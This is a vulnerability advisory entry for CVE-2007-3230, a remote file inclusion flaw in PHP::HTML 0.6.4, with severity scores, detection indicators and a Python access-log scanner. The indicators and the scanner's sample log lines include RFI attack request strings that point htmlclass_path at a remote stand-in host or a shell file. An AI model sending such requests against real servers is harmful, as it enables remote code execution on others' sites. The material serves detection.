CVE-2007-3230
published 2007-06-14


Priority: P351, medium
CVSS 2.0: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
EXPLOIT
EPSS: 67.86% (99.2th percentile)
PHP remote file inclusion vulnerability in phphtml.php in Idan Sofer PHP::HTML 0.6.4 allows remote attackers to execute arbitrary PHP code via a URL in the htmlclass_path parameter.

Affected

1 ranges
Vendor | Product | Version range | Fixed in
simian_systems_inc | sitellite | |

Detection & IOCs (extracted from sources)

url: xxx.com\path\phphtml.php?htmlclass_path=SH3ll.txt?
path: PATH\phphtml.php
  • Monitor HTTP requests to phphtml.php containing a URL or remote path in the 'htmlclass_path' parameter, which is the injection point for remote file inclusion.
  • Look for requests where 'htmlclass_path' parameter value ends with a null-byte or '?' terminator (e.g., 'SH3ll.txt?') — a classic RFI technique to truncate the appended file extension.
  • Vulnerability is specific to PHP::HTML version 0.6.4 only; the RFI exists on line 19 of phphtml.php.
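
The two request checks above, written as a log scanner. This is an added example, not code from the advisory or from the PHP::HTML project; it assumes combined-format access logs, and the sample lines, hostnames and addresses are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines (combined-log style, documentation addresses); not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [14/Jun/2007:10:01:02 +0000] "GET /lib/phphtml.php?htmlclass_path=http://files.example/inc.txt? HTTP/1.1" 200 512',
    '203.0.113.7 - - [14/Jun/2007:10:01:09 +0000] "GET /lib/phphtml.php?htmlclass_path=http%3A%2F%2Ffiles.example%2Finc.txt%00 HTTP/1.1" 200 512',
    '192.0.2.9 - - [14/Jun/2007:10:02:30 +0000] "GET /phphtml.php?htmlclass_path=SH3ll.txt? HTTP/1.1" 200 97',
    '198.51.100.4 - - [14/Jun/2007:10:03:11 +0000] "GET /lib/phphtml.php?htmlclass_path=classes/ HTTP/1.1" 200 2048',
    '198.51.100.4 - - [14/Jun/2007:10:03:40 +0000] "GET /index.php?page=about HTTP/1.1" 200 4096',
]

REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')
# scheme://..., protocol-relative //host, or UNC \\host: the value points off-box.
REMOTE_RE = re.compile(r'^(?:[a-z][a-z0-9+.-]*:)?(?://|\\\\)', re.I)


def check_request(line):
    """Return the reasons a logged request looks like RFI against phphtml.php."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    target = urlsplit(m.group(1))
    if target.path.rsplit("/", 1)[-1].lower() != "phphtml.php":
        return []
    reasons = []
    # parse_qsl percent-decodes, so %3A%2F%2F and %00 are checked in decoded form.
    for name, value in parse_qsl(target.query, keep_blank_values=True):
        if name != "htmlclass_path":
            continue
        if REMOTE_RE.match(value):
            reasons.append("remote-url")
        if "\x00" in value or value.endswith("?"):
            reasons.append("terminator")
    return reasons


def scan(lines):
    """Map line index -> reasons, for flagged lines only."""
    hits = {}
    for i, line in enumerate(lines):
        reasons = check_request(line)
        if reasons:
            hits[i] = reasons
    return hits


if __name__ == "__main__":
    for idx, reasons in scan(SAMPLE_LOG).items():
        print(idx, ",".join(reasons), SAMPLE_LOG[idx])
```

Access logs record only the request line, so a value sent in a request body would have to be inspected at a proxy or WAF instead.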

CVSS provenance

nvd: v2.0, 6.8 MEDIUM, AV:N/AC:M/Au:N/C:P/I:P/A:P
vendor_redhat: 6.5 MEDIUM